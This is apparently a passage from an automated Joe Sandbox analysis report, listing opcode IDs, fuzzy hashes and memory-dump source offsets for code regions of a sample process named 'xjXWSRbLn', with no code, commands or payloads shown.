                            • Opcode ID: 4ccd4dfb435546b06ef429613aa04f704889d2c24d5b45824ca3291c9d0b3f39
                            • Instruction ID: 72f2602879e9958ec3ff42718461cfa3479cd24a3b3aba10adeaeb05b49c9e24
                            • Opcode Fuzzy Hash: 4ccd4dfb435546b06ef429613aa04f704889d2c24d5b45824ca3291c9d0b3f39
                            • Instruction Fuzzy Hash: DED1D170F04605DFCB15AB68C448AAEBFF2FF44300F5544E9D246A72A5EA31EC69CB81
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 85001c52f1a85da0c8d883486e31c48d07e8b4c7060b54e3de1210ef8f38ce13
                            • Instruction ID: 01369b72ea5d9d2be13110625d095dc0a53354747429743cb858b3b837099490
                            • Opcode Fuzzy Hash: 85001c52f1a85da0c8d883486e31c48d07e8b4c7060b54e3de1210ef8f38ce13
                            • Instruction Fuzzy Hash: E9A1B375910619CFDB10EF68C844A98FBB1FF49314F05C699E949BB315EB30AA89CF90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a04b6d5f8c68e1cb18bf113530e36f0eb8b444369f2d3aa969fb8a01591c9ad7
                            • Instruction ID: 101f94a3be3b4219cad8d09131361cf6e7c69dc7ee02c361099a2c2591410f05
                            • Opcode Fuzzy Hash: a04b6d5f8c68e1cb18bf113530e36f0eb8b444369f2d3aa969fb8a01591c9ad7
                            • Instruction Fuzzy Hash: 8281B771A00505DFCF11DF68D8886ADBFB1FF45300F1085AAE146A7264EB30E959CF51
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 045d0b96835526e3a7b87b7ef2229d5ee867f1a35b14fd9385bc2e7a57512266
                            • Instruction ID: a070310a467109365374f7e57161369e4d1d332a253e5ad48d16a33143cffdfa
                            • Opcode Fuzzy Hash: 045d0b96835526e3a7b87b7ef2229d5ee867f1a35b14fd9385bc2e7a57512266
                            • Instruction Fuzzy Hash: A4514630A09208CFDF119BA5D9985ADBFB2FF84300F21419AD545AB296CB31A865CF81
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 38bafd3cbd6d36c0c0120627618ad9e8434062b5062a7d89214a882482bfbe79
                            • Instruction ID: e8b8fda5d56e48f5d93c10721008c96b0a3950b83b2b322b0d989c39b9ec8fc1
                            • Opcode Fuzzy Hash: 38bafd3cbd6d36c0c0120627618ad9e8434062b5062a7d89214a882482bfbe79
                            • Instruction Fuzzy Hash: 0D71F575910619CFDB10DF68C940AA9FBB1FF49314F05C299D949BB315EB30AA89CF90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3419bd4c75aea65b51bd2257e7957cfcf066d2c440a3a57a3544108a6b52007c
                            • Instruction ID: c389af13038b9fc0ae50dd252365a7cea5ae9c43b934b94935e59299c3644a47
                            • Opcode Fuzzy Hash: 3419bd4c75aea65b51bd2257e7957cfcf066d2c440a3a57a3544108a6b52007c
                            • Instruction Fuzzy Hash: 7551B131A002058FCB25DFA9C8547AEB7F6FF89214F5044FAC60AD7241EF31A909CBA1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e998465441509be0cd074ffcdf1251168bdb37c500e188760a012f6b93390767
                            • Instruction ID: 9d1b701c792bbfaa1fff9c772aaea7f000a27acd114eaabf1f49a4ea0b8d5372
                            • Opcode Fuzzy Hash: e998465441509be0cd074ffcdf1251168bdb37c500e188760a012f6b93390767
                            • Instruction Fuzzy Hash: 44510975A00609CFCF04EFA8C8948ADF7B5FF89310B5486A9D516B7354EB34E989CB90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 086be9ea064ca651d442f7b7783c767835a53a724e4d8a8d0033e7eb290544cf
                            • Instruction ID: 1d995adfdb9e41b2502aad141687a4473ff9f933ae06761ba63c49131bc4e73d
                            • Opcode Fuzzy Hash: 086be9ea064ca651d442f7b7783c767835a53a724e4d8a8d0033e7eb290544cf
                            • Instruction Fuzzy Hash: 57517F75F042049FCB18DB68D5997ADBBF2FF88315F1484A9E6069B3A4DB31AC49CB40
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 808794ea5e0ca0adef071948a5a4b27515e9afa732b1b67704d920473c649af8
                            • Instruction ID: 4db1e2c8778c34bc785471ab12cc77ece21e0bd700f99a4c4b8252a75a56db28
                            • Opcode Fuzzy Hash: 808794ea5e0ca0adef071948a5a4b27515e9afa732b1b67704d920473c649af8
                            • Instruction Fuzzy Hash: E9516575900219DFCB04DFA8C948AEDFBB1FF48310F158199E806BB254E770BA89CB80
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f20c0041d6658d9e73abc4ca657987c369d382a967dcfe91c8543c8349a604d
                            • Instruction ID: 1d7b315ba84075c2292e5344a5cff494d777c8947a336b4ca045024fe7f59eaa
                            • Opcode Fuzzy Hash: 2f20c0041d6658d9e73abc4ca657987c369d382a967dcfe91c8543c8349a604d
                            • Instruction Fuzzy Hash: 2F515435A10609DFCB00EFA8D8849EDF7B5FF89304F10859AE515AB321EB71A949CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c2ecf60ec8790ab034b04f2dba0b5047b40b1905bff4d91b8141b3bf2e067a2
                            • Instruction ID: 2a0f0a822aea47c96447f6ea6a6ce87dbf7fec8b3bc7ae30b943a0046db3bd2c
                            • Opcode Fuzzy Hash: 9c2ecf60ec8790ab034b04f2dba0b5047b40b1905bff4d91b8141b3bf2e067a2
                            • Instruction Fuzzy Hash: FA410B70E492569FCB06EF64C948AE93BB2FB45348F1100D6F642EB295F634A919CB90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 744ee1a4d7cb199aa6a3f112d3374b91ab53193e63a9b8ccedda231d4c2d207e
                            • Instruction ID: 400c50cf8acb94ca83fd6cab02a1b84279b2a7551246374365222df17ab94b69
                            • Opcode Fuzzy Hash: 744ee1a4d7cb199aa6a3f112d3374b91ab53193e63a9b8ccedda231d4c2d207e
                            • Instruction Fuzzy Hash: A141D970E4551A9FCB05EF68C848BAA7BF2FB44348F1004A6F606E7394F631E9588B90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4e147da548131f356aee7078909fdfb9a359aa6f62c1e92469ee3cedc3f0d0a7
                            • Instruction ID: 91a3f16d0320240399dfa70c5c7109d76151d79a78ebe6e5737ef999e3d052d8
                            • Opcode Fuzzy Hash: 4e147da548131f356aee7078909fdfb9a359aa6f62c1e92469ee3cedc3f0d0a7
                            • Instruction Fuzzy Hash: 3E411B75B00609CFCF14DFA8C9949ADF7B1FF88310B1486A9D516A7355EB34E989CB80
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: efffaf38234219a54626149d6424df33c083c9c783f457423aa4c79c0d66e0b1
                            • Instruction ID: 76f8bdd3738b00e670f7e1913d475b7930fe631cb6ffd905db2d2138221a0e65
                            • Opcode Fuzzy Hash: efffaf38234219a54626149d6424df33c083c9c783f457423aa4c79c0d66e0b1
                            • Instruction Fuzzy Hash: 14412D35B112089FDB04DFA8D854AADB7B6FF89310F1485A9E542BB3A0DF70E949CB50
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b02514ba030b50c6be60a0d7be6517bb4694e6a47b1da2de4784f21af329f256
                            • Instruction ID: e700d619a7d8414c909bca766b2231fc744368a2fce9b9382397f15890c4218c
                            • Opcode Fuzzy Hash: b02514ba030b50c6be60a0d7be6517bb4694e6a47b1da2de4784f21af329f256
                            • Instruction Fuzzy Hash: 32412C30B012089FDB14DFA9D854AADB7B6FF89310F1485A9E542AB3A0DF70AD49CB50
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80e86b9ee63b3c32a1fbb9eb5d0bf57d4f5e99e66e0e888798fe81f0f7879823
                            • Instruction ID: 8ca4c1ed0e322ccdde19d8816eef17e31b02b983f507c49d5057b9fbaff3803e
                            • Opcode Fuzzy Hash: 80e86b9ee63b3c32a1fbb9eb5d0bf57d4f5e99e66e0e888798fe81f0f7879823
                            • Instruction Fuzzy Hash: F2316B72E44211ABD711AF6CD8519E6BBB6FF85220B1485EBE60987310EE31F84AC7D1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a01f6c21dd8defe14bba8d1e850df73ab4f0e14b28355d39ebf8e12e2fd010b0
                            • Instruction ID: 76defe42e74d7726f02e28f0f64ddd902eec0ba16b7bebd08a7e30a8715766b9
                            • Opcode Fuzzy Hash: a01f6c21dd8defe14bba8d1e850df73ab4f0e14b28355d39ebf8e12e2fd010b0
                            • Instruction Fuzzy Hash: 41416470A08218DFDF119FA5D9984ADFFB2FF44304F258199D441BB256CB3198A5CF40
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c017770a4d4515a42bc0dc7356055608247df2d1e71db1a731dbb9ef3863324
                            • Instruction ID: 3fd52825eddc8829fd759b9e50762c4419f086cf5c1d0f083d99c3431e296f32
                            • Opcode Fuzzy Hash: 9c017770a4d4515a42bc0dc7356055608247df2d1e71db1a731dbb9ef3863324
                            • Instruction Fuzzy Hash: 9C314F75E10618DFCB14DFA8D4549ADBBF6FF88311F10856AE906A7260DF30A845CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b422c9541485c13574c35fcc46a435e5a1580af1b04749523b896472298ef07b
                            • Instruction ID: 900d83c236159db96e1c07d3bfdbda6200cb4f5c6e89832c03672464f7e35b73
                            • Opcode Fuzzy Hash: b422c9541485c13574c35fcc46a435e5a1580af1b04749523b896472298ef07b
                            • Instruction Fuzzy Hash: E831C671A08205AFDB14DF68D849BAEBBF6EF88300F148569E60697250DB75FD48CB90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14df8e8281f1889e4992936431ffdc07e9ca159fefb9cd0879522c1936b46b8a
                            • Instruction ID: fbfdbfc5147a7efdd157daddd0ba080e1ea7a694ddeeabe5a08c9ee2c37f6275
                            • Opcode Fuzzy Hash: 14df8e8281f1889e4992936431ffdc07e9ca159fefb9cd0879522c1936b46b8a
                            • Instruction Fuzzy Hash: C2315435A14609DFCB05EFA8C8548EDFBB5FF49300B01869AE505BB225FB30A949DB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7edfd8ec4a82ba9fc39bd0ad5977affcf3d1db863ea3efed43bf5a4d2e67e6fd
                            • Instruction ID: d8e231981f863c83a665e9fe381d5978442e604e2b7fe5ea3f661d9de39ad259
                            • Opcode Fuzzy Hash: 7edfd8ec4a82ba9fc39bd0ad5977affcf3d1db863ea3efed43bf5a4d2e67e6fd
                            • Instruction Fuzzy Hash: 0021D830E44206DBCF11AB78D4455AABB72FF45300F5149E6DB46A7244EE31F91DCB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 240fbf4428a785e9c0be8ce0b7ffbfd77592d9d6bfdaeccef2f419eac401a697
                            • Instruction ID: 69f42bb0ea5a91eaaca6a24bc758d5a075199a485e3ac7419263e750da3eacd1
                            • Opcode Fuzzy Hash: 240fbf4428a785e9c0be8ce0b7ffbfd77592d9d6bfdaeccef2f419eac401a697
                            • Instruction Fuzzy Hash: 7731F435A10609DFCB04EFA8D854CDDFBB5FF89310F018699E5056B224FB70A949CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3c771d2d881af41fb2a75cdcd4f38d045972aee298fedd3d6ff9718a651d569c
                            • Instruction ID: dac41a31189d944aeed1bb943c5ab293b93c494d0e1db31909e9aa852534907c
                            • Opcode Fuzzy Hash: 3c771d2d881af41fb2a75cdcd4f38d045972aee298fedd3d6ff9718a651d569c
                            • Instruction Fuzzy Hash: 82216035E006098FCB05EBA8D4456EDBBF4FF88311F1046AAD519E7250EB309945CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1404173676.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_13ad000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 26cd6f49ce46699ef95cb36aae369b23472e80604275c1b1381b02d97d9e7296
                            • Instruction ID: 44c53f43bdd146034cc691178c341bfce3fe41e5a8ca1fa37c2bfaf1749287d3
                            • Opcode Fuzzy Hash: 26cd6f49ce46699ef95cb36aae369b23472e80604275c1b1381b02d97d9e7296
                            • Instruction Fuzzy Hash: 6A213672500304DFDB15DF54D9C0B56BB65FB88318F60C16CE90A1FA56C73AE446CAA2
                            Memory Dump Source
                            • Source File: 00000008.00000002.1404714056.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2cbd000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 475faa391238371dd84254a261d3ad970a9ce51bb9f468d736bc249f141eaf6e
                            • Instruction ID: ab9fb4ce700e5d74910a5164c3def672ca256836930c45cae2ea1fbabe18a6d3
                            • Opcode Fuzzy Hash: 475faa391238371dd84254a261d3ad970a9ce51bb9f468d736bc249f141eaf6e
                            • Instruction Fuzzy Hash: 3421D375504300DFDB15DF24E5C4B56BB65EF84314F24C56DE80A4B296C336D447CAA2
                            Memory Dump Source
                            • Source File: 00000008.00000002.1404714056.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2cbd000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d58b93c86647e13a0f91244b7e2e0c1fb33335d47e3793425b284df98003de1c
                            • Instruction ID: b05da884fffeae7e677ca860cd63ae5598a8afeda405666a5d64c9b9abd3d731
                            • Opcode Fuzzy Hash: d58b93c86647e13a0f91244b7e2e0c1fb33335d47e3793425b284df98003de1c
                            • Instruction Fuzzy Hash: 4E21C575904244EFDB16DF14D9C0B65BB65FF84314F24C5ADE90A4B292C336D846CA62
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1aab39dac217d3eb8ce21a48da02b340627f2a7fda5a182041213b0b427a2045
                            • Instruction ID: a14c35b268064cefeee26ae9e63255f043f014dc43755ec1570e59ebb01b7902
                            • Opcode Fuzzy Hash: 1aab39dac217d3eb8ce21a48da02b340627f2a7fda5a182041213b0b427a2045
                            • Instruction Fuzzy Hash: 67211275F102098FCF44DF69C8849AEF7B5FF893007108669E906A7355EB70A949CBA0
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1706f278d3b5c63e36ec29f4b90b72a70c9bd1e3ffd3d41dc7faa028966bfac3
                            • Instruction ID: 73ecc3acfb4d625e11675e22d4a22263e7f63472cde8c0588e59f4233bcc65bc
                            • Opcode Fuzzy Hash: 1706f278d3b5c63e36ec29f4b90b72a70c9bd1e3ffd3d41dc7faa028966bfac3
                            • Instruction Fuzzy Hash: B5217475F002058FCF44DF68C8849AEBBB5FF89200B10456AD90AE7351EB30E949CB90
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa71333cc8edf5a2e58e01ad4cb5c45c8e7e21cb9d0924122822ea791d3aa5f8
                            • Instruction ID: 07625543215882c2e1dc91642a53aaf08db5a729bd5758479593ccf4c5085338
                            • Opcode Fuzzy Hash: aa71333cc8edf5a2e58e01ad4cb5c45c8e7e21cb9d0924122822ea791d3aa5f8
                            • Instruction Fuzzy Hash: 1821FEB59013499FDB10DF9AD984BAEFBF4FB48210F14846EE919A7200C375A904CBA5
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5d8f4b172d89eea58b742a55e8c5e2cb75abf072e5ca367b974968257473d06
                            • Instruction ID: 710c3cb2ed788cf772e797a272125204cc23fd65cef238eebf0abbc436576295
                            • Opcode Fuzzy Hash: b5d8f4b172d89eea58b742a55e8c5e2cb75abf072e5ca367b974968257473d06
                            • Instruction Fuzzy Hash: 2F110A71F04106EBCF126B99E5485FD7FB1EB41314B604CE1D549B3184FA30A5398BD5
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78d4a960bb36ca5b02ebbb36c606a5106c2122d0a88436c88a113e68e07b5f9e
                            • Instruction ID: ed173a7e9388dfe2470c58fba41f71ace24b790b1c45282cc8d25cdd02140585
                            • Opcode Fuzzy Hash: 78d4a960bb36ca5b02ebbb36c606a5106c2122d0a88436c88a113e68e07b5f9e
                            • Instruction Fuzzy Hash: 8C2110B5D013499FDB10CFAAD884A9EFBF4FB48310F10846EE919A7600C375A904CBA0
                            Memory Dump Source
                            • Source File: 00000008.00000002.1404714056.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2cbd000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7223890869d389dc518549bf8b835e8088a302dcb9dacec5cd9ec6ed0a21b99b
                            • Instruction ID: 7339fe46941d37ad356dd622422e492ce1459feaddbdaf9e2a3c05498dba2807
                            • Opcode Fuzzy Hash: 7223890869d389dc518549bf8b835e8088a302dcb9dacec5cd9ec6ed0a21b99b
                            • Instruction Fuzzy Hash: 022180755093809FCB13CF20D590755BF71EF86214F28C5DAD8498F6A7C33A980ACBA2
                            Memory Dump Source
                            • Source File: 00000008.00000002.1404173676.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_13ad000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                            • Instruction ID: f6234daf3c4611b6df85f7bfdbcf01f115b48d279d5c72b36d8a6801f6a00593
                            • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                            • Instruction Fuzzy Hash: 381103B6404240DFDB16CF44D5C4B56BF71FB84324F24C6A9D9090BA57C33AE456CBA2
                            Memory Dump Source
                            • Source File: 00000008.00000002.1404714056.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2cbd000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                            • Instruction ID: 9a6928f90cd76c978ed014dd65fa5906cb89af6ab94b8e26c64e9f746e08fb19
                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                            • Instruction Fuzzy Hash: E4118B75904280DFDB16CF10D5C4B55FFA1FF84314F24C6A9D84A4B696C33AD94ACB62
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23c5d878345febfaea3956f0ab9c51363bf896ce10b1b146a5dd287b6cfc2016
                            • Instruction ID: ee916d5d177ec775b9e4b362ba43950661bac270a9ebedfb132e5f2f89f072d7
                            • Opcode Fuzzy Hash: 23c5d878345febfaea3956f0ab9c51363bf896ce10b1b146a5dd287b6cfc2016
                            • Instruction Fuzzy Hash: EB0126B2F49211BFCB036659E9045E93FF2DB8221471408E7DA49E3291FD31652A87D1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f246ed3ab85d3de6f1e2893232caddc0de6ebcf879a144482665512df7c12d2
                            • Instruction ID: 6a5796a879028a3adbd7e9d5415f727145e26beb475d7805139b3b6bb6034d7c
                            • Opcode Fuzzy Hash: 1f246ed3ab85d3de6f1e2893232caddc0de6ebcf879a144482665512df7c12d2
                            • Instruction Fuzzy Hash: 9B11AC71E0021E9FDB04EF68D8157EEBBB1EF48304F04856ADA15AB390DB74A945CB80
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e68202ba89313f3bb6d91b2d1241e646e61950f3de8bb6a2c9f44ef7d235fe9
                            • Instruction ID: add3ecf113d32387f59aa209662d297d82d525a70b5ad3ed83dfb4ef1af1b7e4
                            • Opcode Fuzzy Hash: 5e68202ba89313f3bb6d91b2d1241e646e61950f3de8bb6a2c9f44ef7d235fe9
                            • Instruction Fuzzy Hash: E301D430A083064BE7399A6AC494B7BBBA7FFC0310F048568EA0646665DE70A886C741
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
